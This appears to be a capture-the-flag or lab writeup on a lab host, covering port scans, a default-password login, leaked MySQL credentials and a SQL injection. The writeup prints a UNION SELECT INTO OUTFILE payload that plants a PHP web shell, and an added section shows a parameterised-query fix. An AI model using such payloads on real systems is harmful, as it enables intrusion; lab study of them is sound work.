Date
Mar 16, 2025 → Mar 16, 2025
Tag
Nmap
Web Application Security
SQL Injection Techniques
192.168.197.147
Nmap
└─# nmap -Pn -n $ip -sU --top-ports=100 --reason
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-16 02:09 EDT
Nmap scan report for 192.168.197.147
Host is up, received user-set.
All 100 scanned ports on 192.168.197.147 are in ignored states.
Not shown: 100 open|filtered udp ports (no-response)
Nmap done: 1 IP address (1 host up) scanned in 21.23 seconds
└─# nmap -sT -p- --min-rate 5000 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-16 02:08 EDT
Warning: 192.168.197.147 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.197.147
Host is up (0.050s latency).
Not shown: 65475 filtered tcp ports (no-response), 56 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
17445/tcp open unknown
30455/tcp open unknown
50080/tcp open unknown
22
brute force
No
17445/30445/50080



From the nmap results we can tell these are nginx and Apache.

Try searchsploit.

There are a lot of scripts we can use.

Dirb
Nothing found.
Feroxbuster
50080

17445

30445

We find a new page on port 50080.

We try admin:admin and log in successfully.

We download the zip file and see what we can find in it.

We can find the MySQL database credentials in this file.
User: issue_user
Password: ManagementInsideOld797
Additionally, we discovered that the priority parameter is vulnerable.


It is GET, so we can't access it; we try to use Burp Suite to do it.
High' union select '<?php echo system($_REQUEST["cmd"]);?>' into outfile '/srv/http/abc.php' -- 

Use it and try to run our command.

Try a reverse shell.
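
For the fix side of the priority finding above, here is an added example (not code from the target application or from this writeup) showing why the concatenated query is injectable and how an allowlist plus a bound parameter closes it. The `issues` table, the function names, the "Low"/"Normal" values, and the use of in-memory SQLite as a stand-in for MySQL are all assumptions.

```python
import sqlite3

# Assumed allowlist: only "High" appears on the page; the other values are hypothetical.
ALLOWED_PRIORITIES = {"Low", "Normal", "High"}

def make_db():
    """Constructed sample data in an in-memory SQLite DB (stand-in for MySQL)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE issues (id INTEGER PRIMARY KEY, title TEXT, priority TEXT)")
    db.executemany("INSERT INTO issues (title, priority) VALUES (?, ?)",
                   [("Login page down", "High"), ("Typo in footer", "Low")])
    return db

def build_query_vulnerable(priority):
    """The flawed pattern: the request value is pasted into the SQL text."""
    return "SELECT title FROM issues WHERE priority = '" + priority + "'"

def find_issues_bound_only(db, priority):
    """Bound parameter alone: a hostile value is compared as a plain string."""
    rows = db.execute("SELECT title FROM issues WHERE priority = ?", (priority,))
    return [r[0] for r in rows]

def find_issues_hardened(db, priority):
    """Allowlist first, then a bound parameter, so the value is never parsed as SQL."""
    if priority not in ALLOWED_PRIORITIES:
        raise ValueError("invalid priority")
    return find_issues_bound_only(db, priority)

# Same structure as the request value above, with the PHP body replaced by 'x' (constructed).
PAYLOAD = "High' union select 'x' into outfile '/srv/http/abc.php' -- "

if __name__ == "__main__":
    db = make_db()
    # The quote closes early, so UNION ... INTO OUTFILE becomes part of the statement.
    print(build_query_vulnerable(PAYLOAD))
    # With binding, no row has that literal priority, so nothing is returned.
    print(find_issues_bound_only(db, PAYLOAD))
    print(find_issues_hardened(db, "High"))
```

On the MySQL side, `INTO OUTFILE` also needs the `FILE` privilege and a `secure_file_priv` setting that permits the target directory, so removing `FILE` from the application account and restricting `secure_file_priv` blocks the file write even if an injection is missed.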
